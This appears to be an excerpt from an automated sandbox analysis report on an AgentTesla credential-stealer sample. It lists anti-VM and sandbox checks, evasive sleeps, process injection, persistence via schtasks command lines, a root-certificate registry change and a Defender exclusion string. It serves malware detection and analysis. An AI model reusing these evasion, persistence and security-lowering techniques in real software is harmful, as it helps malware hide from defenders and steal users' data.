Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.243d308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.newapp.exe.22cd29c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.216d29c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.505779927.0000000002161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.413432114.0000000002431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: edufyrigefy4utwgqeoriufj4ce.exe PID: 1184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 2852, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.413432114.0000000002431000.00000004.00000001.sdmp, newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.413432114.0000000002431000.00000004.00000001.sdmp, newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2636	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe TID: 2640	Thread sleep time: -37852s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe TID: 2640	Thread sleep time: -40000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe TID: 2652	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe TID: 2044	Thread sleep time: -420000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe TID: 2600	Thread sleep time: -5534023222112862s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe TID: 2600	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2524	Thread sleep time: -34373s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2524	Thread sleep time: -40000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2532	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2420	Thread sleep time: -360000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2588	Thread sleep time: -7378697629483816s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2588	Thread sleep time: -90000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1848	Thread sleep count: 553 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1848	Thread sleep count: 3560 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2588	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1704	Thread sleep time: -35914s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1704	Thread sleep time: -40000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2644	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2540	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2168	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2168	Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2840	Thread sleep count: 9574 > 30
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2840	Thread sleep count: 162 > 30
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2168	Thread sleep count: 106 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe

Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Window / User API: threadDelayed 9680			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window / User API: threadDelayed 553			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window / User API: threadDelayed 3560			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window / User API: threadDelayed 9574

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Queries a list of all running processes

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe

Process information queried: ProcessInformation

Jump to behavior

Contains medium sleeps (>= 30s)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Thread delayed: delay time: 37852			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Thread delayed: delay time: 40000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 34373			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 40000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 35914			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 40000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 30000

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: newapp.exe, 00000008.00000002.484160274.00000000056B0000.00000004.00000001.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process token adjusted: Debug

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Memory written: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory written: C:\Users\user\AppData\Roaming\newapp\newapp.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory written: C:\Users\user\AppData\Roaming\newapp\newapp.exe base: 400000 value starts with: 4D5A			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7B0A.tmp'			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC63.tmp'			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp10D3.tmp'			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.664498063.0000000001030000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.664498063.0000000001030000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.664498063.0000000001030000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Queries volume information: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Queries volume information: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Queries the cryptographic machine GUID

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Source: Yara match	File source: 11.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.edufyrigefy4utwgqeoriufj4ce.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.newapp.exe.35699f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.36d99f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.34099f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.330fd40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.newapp.exe.35699f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.3588720.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.36d99f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.newapp.exe.346fd40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.34099f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.35dfd40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.newapp.exe.3418720.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.newapp.exe.32b8720.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.663485397.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.663533545.0000000000402000.00000040.00000001.sdmp, type: MEMORY
